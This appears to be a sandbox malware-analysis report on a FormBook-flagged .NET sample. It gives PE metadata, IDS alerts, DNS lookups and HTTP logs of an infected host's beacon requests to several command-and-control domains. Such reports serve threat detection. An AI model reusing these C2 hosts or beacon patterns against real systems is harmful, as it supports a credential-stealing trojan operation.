                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x6c6580x6c800False0.883170272897data7.85414523612IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x700000x5fc0x600False0.436848958333data4.2146833829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x720000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0x700900x36cdata
                                            RT_MANIFEST0x7040c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright Rogers Peet
                                            Assembly Version8.0.6.0
                                            InternalNameReturnValueNameAttribu.exe
                                            FileVersion5.6.0.0
                                            CompanyNameRogers Peet
                                            LegalTrademarks
                                            Comments
                                            ProductNameBiblan
                                            ProductVersion5.6.0.0
                                            FileDescriptionBiblan
                                            OriginalFilenameReturnValueNameAttribu.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            11/25/21-15:09:09.126288TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.3
                                            11/25/21-15:09:14.229963TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978680192.168.2.334.102.136.180
                                            11/25/21-15:09:14.229963TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978680192.168.2.334.102.136.180
                                            11/25/21-15:09:14.229963TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978680192.168.2.334.102.136.180
                                            11/25/21-15:09:14.348176TCP1201ATTACK-RESPONSES 403 Forbidden804978634.102.136.180192.168.2.3
                                            11/25/21-15:09:19.479118TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979280192.168.2.3142.250.203.115
                                            11/25/21-15:09:19.479118TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979280192.168.2.3142.250.203.115
                                            11/25/21-15:09:19.479118TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979280192.168.2.3142.250.203.115
                                            11/25/21-15:09:36.061017TCP1201ATTACK-RESPONSES 403 Forbidden804981234.102.136.180192.168.2.3
                                            11/25/21-15:09:45.250397ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                            11/25/21-15:10:15.460524TCP1201ATTACK-RESPONSES 403 Forbidden804982134.102.136.180192.168.2.3

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 25, 2021 15:09:08.920068026 CET4976680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:08.943620920 CET804976634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:08.945020914 CET4976680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:08.945138931 CET4976680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:08.966568947 CET804976634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:09.126287937 CET804976634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:09.126313925 CET804976634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:09.126471043 CET4976680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:09.126518011 CET4976680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:09.148281097 CET804976634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:14.207575083 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.229716063 CET804978634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:14.229899883 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.229963064 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.251589060 CET804978634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:14.348176003 CET804978634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:14.348242998 CET804978634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:14.348376989 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.348406076 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.657246113 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.678802013 CET804978634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:19.462028980 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:19.478698969 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:19.478837967 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:19.479118109 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:19.495594025 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:19.985984087 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:20.007325888 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:20.481894016 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:20.482101917 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:20.482167959 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:20.482223034 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:20.482312918 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:20.482362986 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:30.374047041 CET4979480192.168.2.3103.224.212.219
                                            Nov 25, 2021 15:09:30.601291895 CET8049794103.224.212.219192.168.2.3
                                            Nov 25, 2021 15:09:30.601430893 CET4979480192.168.2.3103.224.212.219
                                            Nov 25, 2021 15:09:30.601727009 CET4979480192.168.2.3103.224.212.219
                                            Nov 25, 2021 15:09:30.842940092 CET8049794103.224.212.219192.168.2.3
                                            Nov 25, 2021 15:09:30.842967987 CET8049794103.224.212.219192.168.2.3
                                            Nov 25, 2021 15:09:30.843144894 CET4979480192.168.2.3103.224.212.219
                                            Nov 25, 2021 15:09:30.843224049 CET4979480192.168.2.3103.224.212.219
                                            Nov 25, 2021 15:09:31.060944080 CET8049794103.224.212.219192.168.2.3
                                            Nov 25, 2021 15:09:35.920053005 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:35.941535950 CET804981234.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:35.941663027 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:35.941904068 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:35.963869095 CET804981234.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:36.061017036 CET804981234.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:36.061126947 CET804981234.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:36.061269045 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:36.061312914 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:36.362240076 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:36.383713007 CET804981234.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:43.265239000 CET4981980192.168.2.352.204.216.132
                                            Nov 25, 2021 15:09:46.254756927 CET4981980192.168.2.352.204.216.132
                                            Nov 25, 2021 15:09:52.269841909 CET4981980192.168.2.352.204.216.132
                                            Nov 25, 2021 15:10:05.702598095 CET4982080192.168.2.352.204.216.132
                                            Nov 25, 2021 15:10:08.708707094 CET4982080192.168.2.352.204.216.132
                                            Nov 25, 2021 15:10:14.718280077 CET4982080192.168.2.352.204.216.132
                                            Nov 25, 2021 15:10:15.320949078 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.340595007 CET804982134.102.136.180192.168.2.3
                                            Nov 25, 2021 15:10:15.342658043 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.342689991 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.362282038 CET804982134.102.136.180192.168.2.3
                                            Nov 25, 2021 15:10:15.460524082 CET804982134.102.136.180192.168.2.3
                                            Nov 25, 2021 15:10:15.460556030 CET804982134.102.136.180192.168.2.3
                                            Nov 25, 2021 15:10:15.460710049 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.460736036 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.778795958 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.800736904 CET804982134.102.136.180192.168.2.3

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 25, 2021 15:09:08.834608078 CET4955953192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:08.901595116 CET53495598.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:14.145761967 CET5265053192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:14.206563950 CET53526508.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:19.383676052 CET5836153192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:19.459450960 CET53583618.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:25.058619976 CET5361553192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:25.097635031 CET53536158.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:30.115839005 CET5072853192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:30.372935057 CET53507288.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:35.863133907 CET5377753192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:35.918409109 CET53537778.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:41.107296944 CET5710653192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:42.128709078 CET5710653192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:43.175431967 CET5710653192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:43.262866020 CET53571068.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:45.250235081 CET53571068.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:45.317536116 CET53571068.8.8.8192.168.2.3
                                            Nov 25, 2021 15:10:05.613094091 CET6035253192.168.2.38.8.8.8
                                            Nov 25, 2021 15:10:05.650708914 CET53603528.8.8.8192.168.2.3
                                            Nov 25, 2021 15:10:09.370842934 CET5677353192.168.2.38.8.8.8
                                            Nov 25, 2021 15:10:10.272214890 CET53567738.8.8.8192.168.2.3
                                            Nov 25, 2021 15:10:15.279592037 CET6098253192.168.2.38.8.8.8
                                            Nov 25, 2021 15:10:15.319477081 CET53609828.8.8.8192.168.2.3
                                            Nov 25, 2021 15:10:20.474148035 CET5805853192.168.2.38.8.8.8

                                            ICMP Packets

                                            TimestampSource IPDest IPChecksumCodeType
                                            Nov 25, 2021 15:09:45.250396967 CET192.168.2.38.8.8.8d05e(Port unreachable)Destination Unreachable

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Nov 25, 2021 15:09:08.834608078 CET192.168.2.38.8.8.80x23a1Standard query (0)www.platinumcredit.netA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:14.145761967 CET192.168.2.38.8.8.80x8897Standard query (0)www.151motors.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:19.383676052 CET192.168.2.38.8.8.80x93b8Standard query (0)www.suepersoldiers.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:25.058619976 CET192.168.2.38.8.8.80xe941Standard query (0)www.thefullfledged.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:30.115839005 CET192.168.2.38.8.8.80xd6bStandard query (0)www.arsels.infoA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:35.863133907 CET192.168.2.38.8.8.80xf03eStandard query (0)www.electricatrick.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:41.107296944 CET192.168.2.38.8.8.80xbdc7Standard query (0)www.jakital.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:42.128709078 CET192.168.2.38.8.8.80xbdc7Standard query (0)www.jakital.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:43.175431967 CET192.168.2.38.8.8.80xbdc7Standard query (0)www.jakital.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:05.613094091 CET192.168.2.38.8.8.80x6d29Standard query (0)www.jakital.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:09.370842934 CET192.168.2.38.8.8.80xa6f8Standard query (0)www.xcgtsret.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:15.279592037 CET192.168.2.38.8.8.80xf205Standard query (0)www.vupeliquid.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:20.474148035 CET192.168.2.38.8.8.80xf7cbStandard query (0)www.nbtianzhou.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Nov 25, 2021 15:09:08.901595116 CET8.8.8.8192.168.2.30x23a1No error (0)www.platinumcredit.netplatinumcredit.netCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:08.901595116 CET8.8.8.8192.168.2.30x23a1No error (0)platinumcredit.net34.102.136.180A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:14.206563950 CET8.8.8.8192.168.2.30x8897No error (0)www.151motors.com151motors.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:14.206563950 CET8.8.8.8192.168.2.30x8897No error (0)151motors.com34.102.136.180A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:19.459450960 CET8.8.8.8192.168.2.30x93b8No error (0)www.suepersoldiers.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:19.459450960 CET8.8.8.8192.168.2.30x93b8No error (0)ghs.googlehosted.com142.250.203.115A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:25.097635031 CET8.8.8.8192.168.2.30xe941Name error (3)www.thefullfledged.comnonenoneA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:30.372935057 CET8.8.8.8192.168.2.30xd6bNo error (0)www.arsels.info103.224.212.219A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:35.918409109 CET8.8.8.8192.168.2.30xf03eNo error (0)www.electricatrick.comelectricatrick.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:35.918409109 CET8.8.8.8192.168.2.30xf03eNo error (0)electricatrick.com34.102.136.180A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:43.262866020 CET8.8.8.8192.168.2.30xbdc7No error (0)www.jakital.comAutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:43.262866020 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com52.204.216.132A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:43.262866020 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com54.164.248.48A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:45.250235081 CET8.8.8.8192.168.2.30xbdc7No error (0)www.jakital.comAutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:45.250235081 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com52.204.216.132A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:45.250235081 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com54.164.248.48A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:45.317536116 CET8.8.8.8192.168.2.30xbdc7No error (0)www.jakital.comAutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:45.317536116 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com52.204.216.132A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:45.317536116 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com54.164.248.48A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:05.650708914 CET8.8.8.8192.168.2.30x6d29No error (0)www.jakital.comAutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:10:05.650708914 CET8.8.8.8192.168.2.30x6d29No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com52.204.216.132A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:05.650708914 CET8.8.8.8192.168.2.30x6d29No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com54.164.248.48A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:10.272214890 CET8.8.8.8192.168.2.30xa6f8Server failure (2)www.xcgtsret.comnonenoneA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:15.319477081 CET8.8.8.8192.168.2.30xf205No error (0)www.vupeliquid.comvupeliquid.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:10:15.319477081 CET8.8.8.8192.168.2.30xf205No error (0)vupeliquid.com34.102.136.180A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.platinumcredit.net
                                            • www.151motors.com
                                            • www.suepersoldiers.com
                                            • www.arsels.info
                                            • www.electricatrick.com
                                            • www.vupeliquid.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.34976634.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:09:08.945138931 CET1731OUTGET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1
                                            Host: www.platinumcredit.net
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:09.126287937 CET1734INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:09:09 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "618be73d-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.34978634.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:09:14.229963064 CET1779OUTGET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1
                                            Host: www.151motors.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:14.348176003 CET1780INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:09:14 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "618be75c-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.349792142.250.203.11580C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 25, 2021 15:09:19.479118109 CET6789OUTGET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1
                                            Host: www.suepersoldiers.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:20.481894016 CET6790INHTTP/1.1 200 OK
                                            Date: Thu, 25 Nov 2021 14:09:20 GMT
                                            Expires: Thu, 25 Nov 2021 14:19:20 GMT
                                            Cache-Control: public, max-age=600
                                            ETag: "QUrYJA"
                                            X-Cloud-Trace-Context: e9bf4e2176d1e4f430f08354d7ed8296
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Server: Google Frontend
                                            Connection: close
                                            Data Raw: 33 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 74 69 74 6c 65 3e 53 75 65 70 65 72 20 53 6f 6c 64 69 65 72 73 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 31 30 30 2c 33 30 30 2c 34 30 30 2c 35 30 30 2c 37 30 30 2c 39 30 30 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 40 6d 64 69 2f 66 6f 6e 74 40 6c 61 74 65 73 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 64 65 73 69 67 6e 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 38 61 63 63 64 31 63 35 2e 63 73 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 74 79 6c 65 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 61 70 70 2e 39 30 39 30 37 31 32 38 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 61 66 38 38 30 39 32 37 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 38 61 63 63 64 31 63 35 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 72 6f 6e 67 3e 57 65 27 72 65 20 73 6f 72 72 79 20 62 75 74 20 53 75 65 70 65 72 20 53 6f 6c 64 69 65 72 73 20 64 6f 65 73 6e 27 74 20 77 6f 72 6b 20 70 72 6f 70 65 72 6c 79 20 77 69 74 68 6f 75 74 20 4a 61 76 61 53 63 72 69 70 74 20 65 6e 61 62 6c 65 64 2e 20 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 69 74 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 61 70 70 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 61 66 38 38 30 39 32 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 61 70 70 2e 39 30 39 30 37 31 32 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
